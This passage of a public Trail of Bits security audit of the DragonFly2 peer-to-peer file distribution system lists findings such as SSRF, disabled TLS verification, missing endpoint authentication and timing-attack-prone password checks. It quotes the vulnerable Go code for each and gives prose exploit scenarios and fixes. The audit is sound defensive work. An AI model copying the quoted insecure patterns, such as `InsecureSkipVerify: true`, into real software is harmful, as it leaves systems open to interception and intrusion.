1 \n Low 4 \n Inform ational 5 \n Undetermined 4 CATEGORY BREAKDOWN \n Category Count \n Auditing and Logging 1 \n Authentication 3 \n Con\ufb01guration 1 \n Data Validation 9 \n Denial of Service 1 \n Error Report ing 1 \n Timing 2 \n Unde\ufb01ned Behavior 1 \n Trail of Bits 7 DragonFly2 Security Assessment \n P U B L I C \n Project Summary \n Contact Information \n The following managers were associated with this project: \n Dan Guido , Account Manager Je\ufb00 Braswell , Project Manager \n dan@trailofbits.com je\ufb00.braswell@ trailofbits.com \n The following engineers were associated with this project: \n Pawe\u0142 P\u0142atek , Consultant Sam Alws , Consultant \n pawel.platek@trailofbits.com sam.alws@trailofbits.com \n Project Timeline \n The signi\ufb01cant events and milestones of the project are listed below. \n Date Event \n July 6, 2023 Pre-project kicko\ufb00 call \n July 18, 2023 Status update meeting \n July 24, 2023 Delivery of report draft \n July 24, 2023 Report readout meeting \n September 14, 2023 Delivery of comprehensive report \n Trail of Bits 8 DragonFly2 Security Assessment \n P U B L I C \n Project Goals \n The engagement was scoped to provide a security assessment of DragonFly2. Speci\ufb01cally, \n we sought to answer the following non-exhaustive list of questions: \n \u25cf Is it possible to perform a denial-of-service attack on a DragonFly network? \n \u25cf Is it possible for an attacker to gain administrative privileges? \n \u25cf Are Man-in-the-Middle attacks that change the contents of transferred \ufb01les \n possible? \n \u25cf Can an attacker gain code execution or \ufb01le access on a DragonFly node? \n \u25cf Is potentially untrusted data always thoroughly validated? \n Trail of Bits 9 DragonFly2 Security Assessment \n P U B L I C \n Project Targets \n The engagement involved a review and testing of the targets listed below. \n Dragon\ufb02y2 \n Repository https://github.com/dragon\ufb02yoss \n Version b3a516804fb873d10d866979a0c6353b148cd3f1 \n Type Go \n Platform Unix, macOS \n Nydus \n Repository https://github.com/dragon\ufb02yoss/image-service \n Version 04fb92c5aa980deedf62e69cc2294195a88bab31 \n Type Rust \n Platform Unix, macOS \n Trail of Bits 10 DragonFly2 Security Assessment \n P U B L I C \n Project Coverage \n This section provides an overview of the analysis coverage of the review, as determined by \n our high-level engagement goals. Our approaches included the following: \n \u25cf Use of Semgrep and CodeQL static analysis tools \n \u25cf Use of fuzz testing on the gRPC handlers \n \u25cf A manual review of client ( dfget daemon ), scheduler, and manager code. The \n review focused on externally accessible endpoints (e.g., gRPC, HTTP) and high-level \n business logic. \n \u25cb Many specialized features of these components were not reviewed due to \n time constraints (see next section). \n Coverage Limitations \n Because of the time-boxed nature of testing work, it is common to encounter coverage \n limitations. During this project, we were unable to perform comprehensive testing of the \n following system elem ents, which may warrant further review: \n \u25cf dfcache and dfstore were only partially reviewed \n \u25cf Clients con\ufb01gurations (code in client/config directory) \n \u25cf Command-line programs (code in cmd directory) \n \u25cf Example deployments (code in deploy and hack directory) \n \u25cf Code in the internal directory \n \u25cf The following parts of the Manager component: \n \u25cb Authentication (JWT, OAuth, RBAC) was only slightly reviewed \n \u25cb Cache \n \u25cb Database \n \u25cb Searcher \n \u25cb gRPC server (especially authentication) \n \u25cf The scheduler/announcer subcomponent \n \u25cf Code in the trainer directory and any other code related to Arti\ufb01cial Intelligence or \n Machine Learning features of DragonFly2 \n \u25cf Code in the pkg directory, as only a very limited amount of the code that was tightly \n coupled with the reviewed components was audited \n Trail of Bits 11 DragonFly2 Security Assessment \n P U B L I C \n Automated Testing \n Trail of Bits uses automated techniques to extensively test the security properties of \n software. We use both open-source static analysis and fuzzing utilities, along with tools \n developed in house, to perform automated testing of source code and compiled software. \n Test Harness Con\ufb01guration \n We used the following tools in the automated testing phase of this project: \n Tool Description Policy \n Semgrep An open-source static analysis tool for \ufb01nding bugs and \n enforcing code standards when editing or committing code \n and during build time. Appendix D \n CodeQL A code analysis engine developed by GitHub to automate \n security checks. Appendix D \n Go fuzzing A standard, built-in Go fuzzer. Appendix E \n Trail of Bits 12 DragonFly2 Security Assessment \n P U B L I C \n Codebase Maturity Evaluation \n Trail of Bits uses a tra\ufb03c-light protocol to provide each client with a clear understanding of \n the areas in which its codebase is mature, immature, or underdeveloped. De\ufb01ciencies \n identi\ufb01ed here often stem from root causes within the software development life cycle that \n should be addressed through standardization measures (e.g., the use of common libraries, \n functions, or frameworks) or training and awareness programs. \n Category Summary Result \n Arithmetic No issues with arithmetic were detected during the audit. \n However, we noticed a lack of code checking for integer \n over\ufb02ows. Due to time constraints, we have not veri\ufb01ed \n whether over\ufb02ows are possible. We recommend \n reviewing and testing the code against this kind of issue. \n Moreover, use of the architecture-dependent int type \n may impact system\u2019s correctness (see TOB-DF2-19 ). Further \n Investigation \n Required \n Auditing Log density and the quality of information logged appear \n to be su\ufb03cient. However, we did not try to verify if that is \n true for all execution paths and if all information \n required to perform incident response is always logged. \n Moreover, the security controls for log transition, \n storage, integrity, retention and rotation, and monitoring \n and alerting mechanisms were not audited. Further \n Investigation \n Required \n Authentication / \n Access Controls We discovered numerous vulnerabilities resulting from \n incorrect or missing authentication and access controls. \n In general, it is unclear what are the trust assumptions \n and trust boundaries in the system. The DragonFly2 team \n should perform a threat modeling exercise to discover \n the assumptions, boundaries, and all relevant security \n controls, and to clarify and document possible high-level \n risks in the system. \n From a high-level perspective, our \ufb01ndings pose \n immediate questions about the following system\u2019s \n properties: \n \u25cf Which parts of Manager web UI should be Weak \n Trail of Bits 13 DragonFly2 Security Assessment \n P U B L I C \n authenticated and which are available publicly? \n ( TOB-DF2-1 ) \n \u25cf Who should have network access to the Manager \n web UI? \n \u25cf With what external parties does the Manager \n communicate? How can it authenticate the \n parties? How can the parties authenticate the \n Manager? ( TOB-DF2-3 ) \n \u25cf For which connections TLS is enabled? How can it \n be con\ufb01gured? ( TOB-DF2-17 ) \n \u25cf Who are the potential adversaries against which \n the Proxy\u2019s authentication protects? \n \u25cf What are the possible attack vectors against the \n Proxy? ( TOB-DF2-8 ) \n \u25cf Is it assumed that a peer may try to gain arbitrary \n code execution capabilities on another peer\u2019s \n machine? ( TOB-DF2-12 ) \n \u25cf Should peers be able to access other peer\u2019s \ufb01les \n located in the whole \ufb01lesystem, or only in speci\ufb01c \n parts of the \ufb01lesystem? \n \u25cf Should a dfget daemon have access to the \n whole \ufb01lesystem, or should it operate only on a \n limited set of directories? \n \u25cf How does the mutual TLS authentication provide \n authentication to peers? How does the TLS \n certi\ufb01cate issuer verify the authenticity of an \n actor requesting a certi\ufb01cate? ( TOB-DF2-13 ) \n \u25cf How can TLS certi\ufb01cates be rotated and revoked? \n \u25cf How can the Certi\ufb01cate Authority\u2019s (CA) root \n certi\ufb01cate be rotated? \n \u25cf How can peers securely obtain the correct CA \n certi\ufb01cate? \n \u25cf How integrity of \ufb01les and images distributed in a \n peer-to-peer network is veri\ufb01ed? Who is \n responsible for the integrity veri\ufb01cation and \n when? \n \u25cf Do \ufb01les and images integrity protections require \n collision resistance, or only preimage security? \n ( TOB-DF2-15 ) \n Complexity \n Management Multiple code pieces are a repeated, boilerplate code. \n One example is WithDefault * methods in a Proxy, \n which could be written in a more generic way. Another \n example is getter handlers in the Manager \n ( GetSchedulers , GetUsers , GetSeedPeerClusters , Moderate \n Trail of Bits 14 DragonFly2 Security Assessment \n P U B L I C \n \u2026): because all of these functions follow the same \n structure with only minor di\ufb00erences, they could be \n extracted to a single, generic method. This will help to \n avoid copy-paste bugs like missing important method \n calls (e.g., calls to setPaginationDefault ). \n There are multiple TODO and FIXME comments, some of \n which indicate missing security controls (e.g., a comment \n indicating permanently disabled TLS ). Moreover, multiple \n context.TODO() methods are used, instead of well \n de\ufb01ned contexts. \n Some functions are not used, hindering code readability. \n Examples include the RandString and \n recoverFromPanic methods. \n Parallel v1 and v2 versions of components add a \n signi\ufb01cant amount of complexity. A clearer way of \n migration between versions should be designed. Ideally, \n a code reviewer should see only code speci\ufb01c to a \n selected version. \n Con\ufb01guration We did not review con\ufb01guration of components. Not \n Considered \n Cryptography \n and Key \n Management DragonFly2 makes use of cryptography (e.g., TLS, x509 \n PKI for mTLS, user passwords authentication), but this \n area was not audited due to time constraints. We note \n that the system usually uses modern cryptographic \n libraries with robust algorithms (with the exception \n described in TOB-DF2-8 ). On the other hand, some \n critical operations, such as key generation and \n establishment of Certi\ufb01cate Authority keys, are not \n automated and are left for users to perform. Further \n Investigation \n Required \n Data Handling It is not certain which data is considered to be trusted \n and which is potentially malicious (this ambiguity \n resulted in, e.g., TOB-DF2-2 and TOB-DF2-12 ). Clarifying \n this will be bene\ufb01cial, as having a clear threat model for \n the system will allow users to reason about the security \n guarantees it provides. The process could begin by, for \n example, enumerating all entrypoints to all system \n components. \n Data is validated to some extent, but there are missing Moderate \n Trail of Bits 15 DragonFly2 Security Assessment \n P U B L I C \n checks (see TOB-DF2-14 ). Validation routines are \n scattered in a few places (e.g., in the api repository and \n gRPC handlers ). Centralizing (limiting the amount of \n functions responsible for validation) and uniformizing \n (making similar validations for similar data types) data \n validation should increase the maturity of the system in \n this area. \n There are indications of overly \ufb01ne-grained data \n handling. That is, there are operations that could be \n performed as one \u201cblock,\u201d but are separated and so \n require developers to remember the steps involved in \n manual \u201cexecution\u201d of all the pieces (e.g., TOB-DF2-4 ). \n Moreover, there is a problem of unnecessary custom \n code that deals with common problems, where an \n existing library or APIs could be used instead. For \n example, URLs are handled by regexes and string \n operations instead of dedicated net/url API; the Proxy \n component is written from the scratch, where the Go \n ecosystem probably o\ufb00ers a more robust, ready-to-use \n solution. \n Documentation Documentation on the website is very limited. It does not \n describe some DragonFly2 concepts (like what is a Job, \n Task, or Peer); does not provide actionable instructions \n for common tasks (e.g., usage of the Manager from web \n UI or CLI client); and does not explain con\ufb01guration \n options in-depth. \n There is no documentation bound to the source code \n (e.g., inside the code repository) that would explain \n components\u2019 structure in-depth. At minimum, a README \n \ufb01le should be created for every module (e.g., \n client/daemon, client/dfget, pkg, manager) with \n information like the main functionality of the component, \n how it relates to other components, how the directory \n and \ufb01le structure look from a functional perspective, and \n what are main function calls graphs. \n The docstrings coverage is almost su\ufb03cient, but should \n be improved. Some important interfaces, structures, and \n methods are not documented. This makes it hard to \n reason about functionality and the security assumptions \n of speci\ufb01c functions. For example, it is not obvious what Moderate \n Trail of Bits 16 DragonFly2 Security Assessment \n P U B L I C \n the Task structure\u2019s AddTraffic method does, nor how \n it handles integer over\ufb02ows. \n Some documentation is outdated. For example, the state \n machine shown on the \u201cScheduler\u201d documentation page \n is missing some of the states present in the state \n machine in the code. \n Maintenance We did not review the security of external components, \n which versions of such components are used by the \n DragonFly2, or whether the DragonFly2 team has \n technical or procedural controls for maintaining and \n updating its dependencies. \n We observed code that was copy-pasted from external \n codebases (see appendix C, issue 8 ). Further \n investigation is required to decide on the security of that \n approach to incorporating external code. It may be \n bene\ufb01cial for the DragonFly2 system to design a more \n robust way of dealing with such code (e.g., by vendoring \n the code, or by looking for small, alternative packages \n implementing desired functionalities). Further \n Investigation \n Required \n Memory Safety \n and Error \n Handling The Go language is memory-safe, so we did not review \n potential memory safety issues. \n Error handling generally follows standard Go practices, \n except that some functions\u2019 error values are ignored and \n there are multiple unchecked type assertions. These \n error-prone patterns require further investigation to \n determine if they pose exploitable risks to the system. \n Moreover, we observed a few bugs in the error handling \n ( TOB-DF2-16 , TOB-DF2-9 ), which should be dealt with by \n increasing test coverage and implementation of more \n advanced static analysis. Moderate \n Testing and \n Veri\ufb01cation Unit and integration tests are included throughout the \n codebase. Due to the time constraints on this audit, we \n were not able to verify the thoroughness of the tests. \n Some static analysis tools are used in the CI pipeline, but \n more advanced con\ufb01gurations and tooling could be \n incorporated. Further \n Investigation \n Required \n Trail of Bits 17 DragonFly2 Security Assessment \n P U B L I C \n There is no fuzzing nor property testing. \n Trail of Bits 18 DragonFly2 Security Assessment \n P U B L I C \n Summary of Findings \n The table below summarizes the \ufb01ndings of the review, including type and severity details. \n ID Title Type Severity \n 1 Authentication is not enabled for some Manager\u2019s \n endpoints Authentication Undetermined \n 2 Server-side request forgery vulnerabilities Data Validation High \n 3 Manager makes requests to external endpoints \n with disabled TLS authentication Authentication Low \n 4 Incorrect handling of a task structure\u2019s usedTra\ufb03c \n \ufb01eld Data Validation Low \n 5 Directories created via os.MkdirAll are not \n checked for permissions Data Validation Low \n 6 Slicing operations with hard-coded indexes and \n without explicit length validation Data Validation Inform ational \n 7 Files are closed without error check Unde\ufb01ned \n Behavior Low \n 8 Timing attacks against Proxy\u2019s basic \n authentication are possible Timing Undetermined \n 9 Possible panics due to nil pointer dereference \n when using variables created alongside an error Denial of Service Medium \n 10 TrimLeft is used instead of TrimPre\ufb01x Data Validation Inform ational \n 11 Vertex.DeleteInEdges and Vertex.DeleteOu tEdges \n functions are not thread safe Timing Undetermined \n 12 Arbitrary \ufb01le read and write on a peer machine Data Validation High \n Trail of Bits 19 DragonFly2 Security Assessment \n P U B L I C \n 13 Manager generates mTLS certi\ufb01cates for arbitrary \n IP addresses Authentication High \n 14 gRPC requests are weakly validated Data Validation Undetermined \n 15 Weak integrity checks for downloaded \ufb01les Data Validation High \n 16 Invalid error handling, missing return statement Error Reporting Inform ational \n 17 Tiny \ufb01le download uses hard coded HTTP protocol Con\ufb01guration High \n 18 Incorrect log message Auditing and \n Logging Inform ational \n 19 Usage of architecture-dependent int type Data Validation Inform ational \n Trail of Bits 20 DragonFly2 Security Assessment \n P U B L I C \n Detailed Findings \n 1. Authentication is not enabled for some Manager\u2019s endpoints \n Severity: Undetermined Di\ufb03culty: High \n Type: Authentication Finding ID: TOB-DF2-1 \n Target: Dragonfly2/manager/router/router.go \n Description \n The /api/v1/jobs and /preheats endpoints in Manager web UI are accessible without \n authentication. Any user with network access to the Manager can create, delete, and \n modify jobs, and create preheat jobs. \n job := apiv1.Group( \"/jobs\" ) \n Figure 1.1: The /api/v1/jobs endpoint de\ufb01nition \n ( Dragonfly2/manager/router/router.go#191 ) \n // Compatible with the V1 preheat. \n pv1 := r.Group( \"/preheats\" ) \n r.GET( \"_ping\" , h.GetHealth) \n pv1.POST( \"\" , h.CreateV1Preheat) \n pv1.GET( \":id\" , h.GetV1Preheat) \n Figure 1.2: The /preheats endpoint de\ufb01nition \n ( Dragonfly2/manager/router/router.go#206\u2013210 ) \n Exploit Scenario \n An unauthenticated adversary with network access to a Manager web UI uses \n /api/v1/jobs endpoint to create hundreds of useless jobs. The Manager is in a \n denial-of-service state, and stops accepting requests from valid administrators. \n Recommendations \n Short term, add authentication and authorization to the /api/v1/jobs and /preheats \n endpoints. \n Long term, rewrite the Manager web API so that all endpoints are authenticated and \n authorized by default, and only selected endpoints explicitly disable these security controls. \n Alternatively, rewrite the API into public and private parts using groups, as demonstrated in \n Trail of Bits 21 DragonFly2 Security Assessment \n P U B L I C \n this comment . The proposed design will prevent developers from forgetting to protect \n some endpoints. \n Trail of Bits 22 DragonFly2 Security Assessment \n P U B L I C \n 2. Server-side request forgery vulnerabilities \n Severity: High Di\ufb03culty: Medium \n Type: Data Validation Finding ID: TOB-DF2-2 \n Target: Various locations \n Description \n There are multiple server-side request forgery (SSRF) vulnerabilities in the DragonFly2 \n system. The vulnerabilities enable users to force DragonFly2\u2019s components to make \n requests to internal services, which otherwise are not accessible to the users. \n One SSRF attack vector is exposed by the Manager\u2019s API. The API allows users to create \n jobs. When creating a Preheat type of a job, users provide a URL that the Manager connects \n to (see \ufb01gures 2.1\u20132.3). The URL is weakly validated, and so users can trick the Manager \n into sending HTTP requests to services that are in the Manager\u2019s local network. \n func (p *preheat) CreatePreheat(ctx context.Context, schedulers []models.Scheduler, \n json types.PreheatArgs) (*internaljob.GroupJobState, error ) { \n [skipped] \n url := json.URL \n [skipped] \n // Generate download files \n var files []internaljob.PreheatRequest \n switch PreheatType(json.Type) { \n case PreheatImageType: \n // Parse image manifest url \n skipped , err := parseAccessURL(url) \n [skipped] \n files, err = p.getLayers(ctx, url, tag, filter, \n nethttp.MapToHeader(rawheader), image) \n [skipped] \n case PreheatFileType: \n [skipped] \n } \n Figure 2.1: A method handling Preheat job creation requests \n ( Dragonfly2/manager/job/preheat.go#89\u2013132 ) \n func (p *preheat) getLayers (ctx context.Context, url, tag, filter string , header \n http.Header, image *preheatImage) ([]internaljob.PreheatRequest, error ) { \n Trail of Bits 23 DragonFly2 Security Assessment \n P U B L I C \n ctx, span := tracer.Start(ctx, config.SpanGetLayers, \n trace.WithSpanKind(trace.SpanKindProducer)) \n defer span.End() \n resp, err := p.getManifests(ctx, url, header) \n Figure 2.2: A method called by the CreatePreheat function \n ( Dragonfly2/manager/job/preheat.go#176\u2013180 ) \n func (p *preheat) getManifests(ctx context.Context, url string , header http.Header) \n (*http.Response, error ) { \n req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil ) \n if err != nil { \n return nil , err \n } \n req.Header = header \n req.Header.Add(headers.Accept, schema2.MediaTypeManifest) \n client := &http.Client{ \n Timeout: defaultHTTPRequesttimeout, \n Transport: &http.Transport{ \n TLSClientConfig: &tls.Config{InsecureSkipVerify: true }, \n }, \n } \n resp, err := client.Do(req) \n if err != nil { \n return nil , err \n } \n return resp, nil \n } \n Figure 2.3: A method called by the getLayers function \n ( Dragonfly2/manager/job/preheat.go#211\u2013233 ) \n A second attack vector is in peer-to-peer communication. A peer can ask another peer to \n make a request to an arbitrary URL by triggering the pieceManager.DownloadSource \n method (\ufb01gure 2.4), which calls the httpSourceClient.GetMetadata method, which \n performs the request. \n func (pm *pieceManager) DownloadSource(ctx context.Context, pt Task, peerTaskRequest \n *schedulerv1.PeerTaskRequest, parsedRange *nethttp.Range) error { \n Figure 2.4: Signature of the DownloadSource function \n ( Dragonfly2/client/daemon/peer/piece_manager.go#301 ) \n Another attack vector is due to the fact that HTTP clients used by the DragonFly2\u2019s \n components do not disable support for HTTP redirects. This con\ufb01guration means that an \n Trail of Bits 24 DragonFly2 Security Assessment \n P U B L I C \n HTTP request sent to a malicious server may be redirected by the server to a component\u2019s \n internal service. \n Exploit Scenario \n An unauthenticated user with access to the Manager API registers himself with a guest \n account. The user creates a preheat job\u2014he is allowed to do so, because of a bug \n described in TOB-DF2-1 \u2014with a URL pointing to an internal service. The Manager makes \n the request to the service on behalf of the malicious user. \n Recommendations \n Short term, investigate all potential SSRF attack vectors in the DragonFly2 system and \n mitigate risks by either disallowing requests to internal networks or creating an allowlist \n con\ufb01guration that would limit networks that can be requested. Disable automatic HTTP \n redirects in HTTP clients. Alternatively, inform users about the SSRF attack vectors and \n provide them with instructions on how to mitigate this attack on the network level (e.g., by \n con\ufb01guring \ufb01rewalls appropriately). \n Long term, ensure that applications cannot be tricked to issue requests to arbitrary \n locations provided by its users. Consider implementing a single, centralized class \n responsible for validating the destinations of requests. This will increase code maturity with \n respect to HTTP request handling. \n Trail of Bits 25 DragonFly2 Security Assessment \n P U B L I C \n 3. Manager makes requests to external endpoints with disabled TLS \n authentication \n Severity: Low Di\ufb03culty: Low \n Type: Authentication Finding ID: TOB-DF2-3 \n Target: Dragonfly2/manager/job/preheat.go \n Description \n The Manager disables TLS certi\ufb01cate veri\ufb01cation in two HTTP clients (\ufb01gures 3.1 and 3.2). \n The clients are not con\ufb01gurable, so users have no way to re-enable the veri\ufb01cation. \n func getAuthToken(ctx context.Context, header http.Header) ( string , error ) { \n [skipped] \n client := &http.Client{ \n Timeout: defaultHTTPRequesttimeout, \n Transport: &http.Transport{ \n TLSClientConfig: &tls.Config{InsecureSkipVerify: true }, \n }, \n } \n [skipped] \n } \n Figure 3.1: getAuthToken function with disabled TLS certi\ufb01cate veri\ufb01cation \n ( Dragonfly2/manager/job/preheat.go#261\u2013301 ) \n func (p *preheat) getManifests(ctx context.Context, url string , header http.Header) \n (*http.Response, error ) { \n [skipped] \n client := &http.Client{ \n Timeout: defaultHTTPRequesttimeout, \n Transport: &http.Transport{ \n TLSClientConfig: &tls.Config{InsecureSkipVerify: true }, \n }, \n } \n [skipped] \n } \n Figure 3.2: getManifests function with disabled TLS certi\ufb01cate veri\ufb01cation \n ( Dragonfly2/manager/job/preheat.go#211\u2013233 ) \n Trail of Bits 26 DragonFly2 Security Assessment \n P U B L I C \n Exploit Scenario \n A Manager processes dozens of preheat jobs. An adversary performs a network-level \n Man-in-the-Middle attack, providing invalid data to the Manager. The Manager preheats \n with the wrong data, which later causes a denial of service and \ufb01le integrity problems. \n Recommendations \n Short term, make the TLS certi\ufb01cate veri\ufb01cation con\ufb01gurable in the getManifests and \n getAuthToken methods. Preferably, enable the veri\ufb01cation by default. \n Long term, enumerate all HTTP, gRPC, and possibly other clients that use TLS and \n document their con\ufb01gurable and non-con\ufb01gurable (hard-coded) settings. Ensure that all \n security-relevant settings are con\ufb01gurable or set to secure defaults. Keep the list up to date \n with the code. \n Trail of Bits 27 DragonFly2 Security Assessment \n P U B L I C \n 4. Incorrect handling of a task structure\u2019s usedTra\u0000c \ufb01eld \n Severity: Low Di\ufb03culty: Medium \n Type: Data Validation Finding ID: TOB-DF2-4 \n Target: Dragonfly2/client/daemon/peer/piece_manager.go \n Description \n The processPieceFromSource method (\ufb01gure 4.1) is part of a task processing \n mechanism. The method writes pieces of data to storage, updating a Task structure along \n the way. The method does not update the structure\u2019s usedTraffic \ufb01eld, because an \n uninitialized variable n is used as a guard to the AddTraffic method call, instead of the \n result.Size variable. \n var n int64 \n result.Size, err = pt.GetStorage().WritePiece( [skipped] ) \n result.FinishTime = time.Now().UnixNano() \n if n > 0 { \n pt.AddTraffic( uint64 (n)) \n } \n Figure 4.1: Part of the processPieceFromSource method with a bug \n ( Dragonfly2/client/daemon/peer/piece_manager.go#264\u2013290 ) \n Exploit Scenario \n A task is processed by a peer. The usedTraffic metadata is not updated during the \n processing. Rate limiting is incorrectly applied, leading to a denial-of-service condition for \n the peer. \n Recommendations \n Short term, replace the n variable with the result.Size variable in the \n processPieceFromSource method. \n Long term, add tests for checking if all Task structure \ufb01elds are correctly updated during \n task processing. Add similar tests for other structures. \n Trail of Bits 28 DragonFly2 Security Assessment \n P U B L I C \n 5. Directories created via os.MkdirAll are not checked for permissions \n Severity: Low Di\ufb03culty: High \n Type: Data Validation Finding ID: TOB-DF2-5 \n Target: Various locations \n Description \n DragonFly2 uses the os.MkdirAll function to create certain directory paths with speci\ufb01c \n access permissions. This function does not perform any permission checks when a given \n directory path already exists. This allows a local attacker to create a directory to be used \n later by DragonFly2 with broad permissions before DragonFly2 does so, potentially allowing \n the attacker to tamper with the \ufb01les. \n Exploit Scenario \n Eve has unprivileged access to the machine where Alice uses DragonFly2. Eve watches the \n commands executed by Alice and introduces new directories/paths with 0777 permissions \n before DragonFly2 does so. Eve can then delete and forge \ufb01les in that directory to change \n the results of further commands executed by Alice. \n Recommendations \n Short term, when using utilities such as os.MkdirAll , os.WriteFile , or \n outil.WriteFile , check all directories in the path and validate their owners and \n permissions before performing operations on them. This will help avoid situations where \n sensitive information is written to a pre-existing attacker-controlled path. Alternatively, \n explicitly call the chown and chmod methods on newly created \ufb01les and permissions. We \n recommend making a wrapper method around \ufb01le and directory creation functions that \n would handle pre-existence checks or would chain the previously mentioned methods. \n Long term, enumerate \ufb01les and directories for their expected permissions overall, and \n build validation to ensure appropriate permissions are applied before creation and upon \n use. Ideally, this validation should be centrally de\ufb01ned and used throughout the entire \n application. \n Trail of Bits 29 DragonFly2 Security Assessment \n P U B L I C \n 6. Slicing operations with hard-coded indexes and without explicit length \n validation \n Severity: Informational Di\ufb03culty: High \n Type: Data Validation Finding ID: TOB-DF2-6 \n Target: Dragonfly2/client/daemon/peer/piece_downloader.go, \n Dragonfly2/scheduler/resource/peer.go \n Description \n In the buildDownloadPieceHTTPRequest and DownloadTinyFile methods (\ufb01gures 6.1 \n and 6.2), there are array slicing operations with hard-coded indexes. If the arrays are \n smaller than the indexes, the code panics. \n This \ufb01nding\u2019s severity is informational, as we were not able to trigger the panic with a \n request from an external actor. \n func (p *pieceDownloader) buildDownloadPieceHTTPRequest(ctx context.Context, d \n *DownloadPieceRequest) *http.Request { \n // FIXME switch to https when tls enabled \n targetURL := url.URL{ \n Scheme: p.scheme, \n Host: d.DstAddr, \n Path: fmt.Sprintf( \"download/%s/%s\" , d.TaskID[: 3 ], d.TaskID), \n RawQuery: fmt.Sprintf( \"peerId=%s\" , d.DstPid), \n } \n Figure 6.1: If d.TaskID length is less than 3, the code panics \n ( Dragonfly2/client/daemon/peer/piece_downloader.go#198\u2013205 ) \n func (p *Peer) DownloadTinyFile() ([] byte , error ) { \n ctx, cancel := context.WithTimeout(context.Background(), \n downloadTinyFileContextTimeout) \n defer cancel() \n // Download url: \n http://${host}:${port}/download/${taskIndex}/${taskID}?peerId=${peerID} \n targetURL := url.URL{ \n Scheme: \"http\" , \n Host: fmt.Sprintf( \"%s:%d\" , p.Host.IP, p.Host.DownloadPort), \n Path: fmt.Sprintf( \"download/%s/%s\" , p.Task.ID[: 3 ], p.Task.ID), \n RawQuery: fmt.Sprintf( \"peerId=%s\" , p.ID), \n } \n Trail of Bits 30 DragonFly2 Security Assessment \n P U B L I C \n Figure 6.2: If p.Task.ID length is less than 3, the code panics \n ( Dragonfly2/scheduler/resource/peer.go#436\u2013446 ) \n Recommendations \n Short term, explicitly validate lengths of arrays before performing slicing operations with \n hard-coded indexes. If the arrays are known to always be of su\ufb03cient size, add a comment \n in code to indicate this, so that further reviewers of the code will not have to triage this \n false positive. \n Long term, add fuzz testing to the codebase. This type of testing helps to identify missing \n data validation and inputs triggering panics. \n Trail of Bits 31 DragonFly2 Security Assessment \n P U B L I C \n 7. Files are closed without error check \n Severity: Low Di\ufb03culty: High \n Type: Unde\ufb01ned Behavior Finding ID: TOB-DF2-7 \n Target: Various locations \n Description \n Several methods in the DragonFly2 codebase defer \ufb01le close operations after writing to a \n \ufb01le. This may introduce unde\ufb01ned behavior, as the \ufb01le\u2019s content may not be \ufb02ushed to disk \n until the \ufb01le has been closed. \n Errors arising from the inability to \ufb02ush content to disk while closing will not be caught, and \n the application may assume that content was written to disk successfully. See the example \n in \ufb01gure 7.1. \n file, err := os.OpenFile(t.DataFilePath, os.O_RDWR, defaultFileMode) \n if err != nil { \n return 0 , err \n } \n defer file.Close() \n Figure 7.1: Part of the localTaskStore.WritePiece method \n ( Dragonfly2/client/daemon/storage/local_storage.go#124\u2013128 ) \n The bug occurs in multiple locations throughout the codebase. \n Exploit Scenario \n The server on which the DragonFly2 application runs has a disk that periodically fails to \n \ufb02ush content due to a hardware failure. As a result, certain methods in the codebase \n sometimes fail to write content to disk. This causes unde\ufb01ned behavior. \n Recommendations \n Short term, consider closing \ufb01les explicitly at the end of functions and checking for errors. \n Alternatively, defer a wrapper function to close the \ufb01le and check for errors if applicable. \n Long term, test the DragonFly2 system with \u201cfailure injection\u201d technique. This technique \n works by randomly failing system-level calls (like the one responsible for writing a \ufb01le to a \n disk) and checking if the application under test correctly handles the error. \n References \n \u25cf \"Don't defer Close() on writable \ufb01les\" blog post \n Trail of Bits 32 DragonFly2 Security Assessment \n P U B L I C \n \u25cf \u201cSecurity assessment techniques for Go projects\u201d, Fault injection chapter \n Trail of Bits 33 DragonFly2 Security Assessment \n P U B L I C \n 8. Timing attacks against Proxy\u2019s basic authentication are possible \n Severity: Undetermined Di\ufb03culty: High \n Type: Timing Finding ID: TOB-DF2-8 \n Target: Dragonfly2/client/daemon/proxy/proxy.go \n Description \n The access control mechanism for the Proxy feature uses simple string comparisons and is \n therefore vulnerable to timing attacks. An attacker may try to guess the password one \n character at a time by sending all possible characters to a vulnerable mechanism and \n measuring the comparison instruction\u2019s execution times. \n The vulnerability is shown in \ufb01gure 8.1, where both the username and password are \n compared with a short-circuiting equality operation. \n if user != proxy.basicAuth.Username || pass != proxy.basicAuth.Password { \n Figure 8.1: Part of the ServeHTTP method with code line vulnerable to the timing attack \n ( Dragonfly2/client/daemon/proxy/proxy.go#316 ) \n It is currently undetermined what an attacker may be able to do with access to the proxy \n password. \n Recommendations \n Short term, replace the simple string comparisons used in the ServeHTTP method with \n constant-time comparisons. This will prevent the possibility of timing the comparison \n operation to leak passwords. \n Long term, use static analysis to detect code vulnerable to simple timing attacks. For \n example, use the CodeQL\u2019s go/timing-attack query . \n References \n \u25cf Timeless Timing Attacks : this presentation explains how timing attacks can be made \n more e\ufb03cient. \n \u25cf Go crypto/subtle ConstantTimeCompare method : this method implements a \n constant-time comparison. \n Trail of Bits 34 DragonFly2 Security Assessment \n P U B L I C \n 9. Possible panics due to nil pointer dereference when using variables created \n alongside an error \n Severity: Medium Di\ufb03culty: Medium \n Type: Denial of Service Finding ID: TOB-DF2-9 \n Target: Dragonfly2/client/daemon/rpcserver/rpcserver.go, \n Dragonfly2/client/daemon/peer/peertask_manager.go \n Description \n We found two instances in the DragonFly codebase where the \ufb01rst return value of a \n function is dereferenced even when the function returns an error (\ufb01gures 9.1 and 9.2). This \n can result in a nil dereference, and cause code to panic . The codebase may contain \n additional instances of the bug. \n request, err := source.NewRequestWithContext(ctx, parentReq.Url, \n parentReq.UrlMeta.Header) \n if err != nil { \n log.Errorf( \"generate url [%v] request error: %v\" , request.URL, err) \n span.RecordError(err) \n return err \n } \n Figure 9.1: If there is an error, the request.URL variable is used even if the request is nil \n ( Dragonfly2/client/daemon/rpcserver/rpcserver.go#621\u2013626 ) \n prefetch, err := ptm.getPeerTaskConductor(context.Background(), taskID, req, limit, \n nil , nil , desiredLocation, false ) \n if err != nil { \n logger.Errorf( \"prefetch peer task %s/%s error: %s\" , prefetch.taskID, \n prefetch.peerID, err) \n return nil \n } \n Figure 9.2: prefetch may be nil when there is an error, and trying to get prefetch.taskID \n can cause a nil dereference panic \n ( Dragonfly2/client/daemon/peer/peertask_manager.go#294\u2013298 ) \n Exploit Scenario \n Eve is a malicious actor operating a peer machine. She sends a dfdaemonv1.DownRequest \n request to her peer Alice. Alice\u2019s machine receives the request, resolves a nil variable in \n the server.Download method, and panics. \n Trail of Bits 35 